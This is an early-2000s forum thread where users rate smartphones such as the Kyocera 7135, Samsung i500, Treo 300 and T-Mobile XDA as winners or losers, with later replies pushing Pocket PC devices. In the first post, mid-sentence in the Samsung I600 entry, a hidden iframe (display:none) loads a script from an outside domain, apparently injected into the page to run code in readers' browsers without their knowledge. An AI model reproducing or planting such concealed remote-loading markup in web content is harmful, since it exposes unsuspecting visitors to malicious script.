+ Reply to Thread
    To Greatness, I Aspire

Thumbs up SmartPhones - Winners and Losers

Well, My i300 is still my trusty companion but I am getting anxious about having a new device. It's almost Christmas. I wanted to share my thoughts on the SmartPhone winners and losers over the next 3 months for all you "early adopters"

WINNERS

Kyo 7135
    On paper, it rules. I am sure Kyo 6035 users can't wait to switch. Great color, removable battery, flip, expansion, MP3 players. WOW!!! Wish I could see one in person.

Samsung I500
    I like this phone. Pricing is key. For someone who demands a small phone, but wants a smartphone, I have not seen a better device. $100 less than Kyo 7135 would be a good deal.

T-Mobile XDA
    Best to date from MS. Best screen shipping to date. MS app support. Nice start to PPC. Watch our for Samsung I700. Looks nice but Samsung has too many product in the pipe. Some may never come out

Treo 300
    I can't count this phone out. I really wanted to love it. Better screen than I300, flip, and keyboard. I am more data than voice so it seemed perfect. If it was triband and replaceable battery I may have put this #1 on my list

LOSERS:
    Samsung I330
    Too little, too late. The I300 was before its time, The I330 is after its time. I cannot believe they did not at least update the screen quality. I guess this product did not get a lot of attention.

Audiovox Thera
    You have got to be kidding me. $600+, poor phone integration, can' hold up as phone to face. Phone is DOA.

Samsung I600
    I am not sure that I would buy the first edition MS SmartPhone 2002. Some features like no touchscreen I don't get. How do you get data in phone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Unless Samsung and the carriers are planning to offer the 330 at a very low price point (like $299 or lower) I really can't see how they'd sell any.

There are just too many good options that will be hitting the streets soon.

I agree about the Treo 300. It's the single band and the fact that you don't have a universal 2.5 headset jack that keep me from pulling the trigger.

I'm waiting for either the 7135 or I-500. First one on the shelves at Sprint gets my $$$$.

Administrator

Arrow

jayhawk i second your opinion! im not leaving sprint for any phone.. so its a toss up for me also.. the 500 or the 7135...

ditto!

Napoleon Bonaparte Jr.

Talking hello

:o :p

Hello to everyone !

Pocket PC Phone Edition !!!

Nothing else you neeed it !!!

http://www.howardchui.com/modules.ph...tid=106&page=1
    Attached Thumbnails Attached Thumbnails SmartPhones - Winners and Losers-o2_xda_150.jpg  

Napoleon Bonaparte Jr.

Cool hello

:p :o

I used T-Mobil Pocket PC for one month and I am highly

recomending . I am still having my I-300 just for fun .

XDA is the BEST !!!
    Attached Thumbnails Attached Thumbnails SmartPhones - Winners and Losers-xda_medium.jpg  

Napoleon Bonaparte Jr.

hello

:o :p

Do not buy XDA from EBAY .

New version just came out . Very good one .
    Attached Thumbnails Attached Thumbnails SmartPhones - Winners and Losers-sunlite.jpg  

Sidekick $99

Don't forget the Danger Sidekick for $99. No is is not color, but is is NOT $500

http://www.amazon.com/exec/obidos/tg...nce&s=wireless

Richard

Napoleon Bonaparte Jr.

Thumbs down hello

Sidekick is trash with no OS !!! No Palm , no Pocket PC .

i300 knucklehead

goodbye

Originally posted by sprint

Sidekick is trash with no OS !!! No Palm , no Pocket PC .
    Sorry dude, you just went back into my killfile. Tired of the PPC ads.

Goodbye